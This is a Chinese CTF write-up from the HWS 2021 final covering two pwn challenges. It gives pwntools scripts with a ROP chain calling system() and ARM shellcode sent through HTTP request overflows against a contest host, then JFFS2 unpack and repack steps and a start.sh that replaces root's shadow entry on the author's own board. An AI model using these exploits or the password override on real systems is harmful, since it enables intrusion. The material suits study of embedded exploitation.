
HWS 2021 结营赛 Pwn

source link: https://xuanxuanblingbling.github.io/ctf/pwn/2021/03/06/hws/

HWS 2021 结营赛 Pwn

发表于 2021-03-06

| 分类于 CTF/Pwn

更新中…结营赛还有非常多值得探索的东西

Pwn1: easyserver

串口看输出

from pwn import *
#context.log_level = 'debug'

# Pwn1 (easyserver) solve script as given in the writeup. The target is the
# contest service at 20.21.2.27:59816; output was read on the serial console.
p = remote('20.21.2.27', 59816)

# Hard-coded addresses for the target binary: a `pop {r0, pc}` gadget, a
# base address the command text is reached from, and system(). The page does
# not show how they were obtained.
pop_r0_pc = 0x0006099c
cmd_base = 0x008ACE4
system = 0x00019158

# The first request line carries the shell command as plain text.
cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
payload  = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
# Second line: 1100 filler bytes, then the gadget address, the value that
# the gadget pops into r0 (cmd_base+13 -- presumably where the command text
# sits in memory; the offset is not derived on this page), and system().
# cyclic(100) is trailing padding; the three CRLFs end the request.
# Defender's view: the service evidently copies request data into a
# fixed-size stack buffer without a length check (inferred from the
# overflow); bounding the copy and building with stack protector / NX /
# ASLR would remove this bug class.
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload

p.send(payload)
p.interactive()

Pwn3: babyhttpd

串口看输出

from pwn import *
#context.log_level = 'debug'
# asm() below targets 32-bit ARM.
context(arch='arm')

# Earlier variant the author kept (lists /tmp); superseded by the version
# below, which differs only in the constants and the appended path string.
# shellcode  = asm('''
# add   r4, pc, #56
# str   r4, [sp, #8]
# sub   r2, r2, r2 
# strb  r2, [r4, #4] 

# sub   r2, r2, r2       
# add   r3, pc, #28      
# str   r3, [sp, #4]     
# str   r2, [sp, #12]     
# mov   r0, r3, lsl r2   
# strb  r2, [r3, #7]     
# add   r3, pc, #4       
# add   r1, sp, #4       
# strb  r2, [r3, #1]     
# swi   0x90ff0b         
# ''')+'/bin/ls//tmp'


# Position-independent ARM payload. r2 is zeroed (sub r2, r2, r2); the
# pc-relative adds point r3/r4 into the string appended after the code; the
# strb stores write zero bytes at fixed offsets (in-place terminators); the
# str stores build a small pointer array at sp+4 that r1 then addresses,
# with r0 = r3, before the `swi` trap. The constants are tied to the byte
# length of the appended string and are not derived on this page.
shellcode  = asm('''
add   r4, pc, #60
str   r4, [sp, #8]
sub   r2, r2, r2 
strb  r2, [r4, #25] 

sub   r2, r2, r2       
add   r3, pc, #28      
str   r3, [sp, #4]     
str   r2, [sp, #12]     
mov   r0, r3, lsl r2   
strb  r2, [r3, #8]     
add   r3, pc, #4       
add   r1, sp, #4       
strb  r2, [r3, #1]     
swi   0x90ff0b         
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'

p = remote('20.21.2.27', 5000)

# Request line: 'POST /', six 0x11 bytes, the shellcode, then CRLF CRLF.
# Body: a `name=` field of 655 filler bytes followed by the hard-coded word
# 0x22504 (presumably the address the overwritten return slot is redirected
# to -- its derivation is not shown on this page), then a second field.
# Defender's view: the `name` parameter is copied into a fixed buffer
# without a length check (inferred); a bounded copy plus a non-executable
# stack would break both the overwrite and the shellcode execution.
payload  = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'

p.send(payload)
p.interactive()

板子拿shell

jffs2解包

# Install jefferson to extract JFFS2 file systems
# Shell transcript (the leading `$ ` is the prompt). cstruct is a
# dependency of jefferson. Note that `setup.py install` under sudo runs
# code from a fresh git checkout as root and installs it system-wide; a
# virtualenv avoids both.
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
# With jefferson available, binwalk can recursively (-M) extract (-e) the
# JFFS2 image.
binwalk -Me test.img

jffs2打包

# Repack the modified root filesystem. mtd-utils provides mkfs.jffs2:
# `-r rootfs` is the directory tree to pack, `-o rootfs.img` the output.
sudo apt install mtd-utils
mkfs.jffs2 -r rootfs -o rootfs.img 

修改start.sh

#!/bin/sh
# Modified start.sh for the author's own dev board (the "get a shell on the
# board" step of the writeup): copy /etc to a writable location, replace the
# root entry in the copied shadow file with a hash the author knows, then
# mount the copy over /etc so password checks read the edited file. Only
# the copy under /tmp is written to.
cp -r /etc /tmp/
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
# NOTE(review): `-o loop` is intended for image files; overlaying a
# directory is normally `mount --bind /tmp/etc /etc`. Confirm which form the
# board's mount implementation (BusyBox?) accepts.
mount -o loop /tmp/etc/ /etc
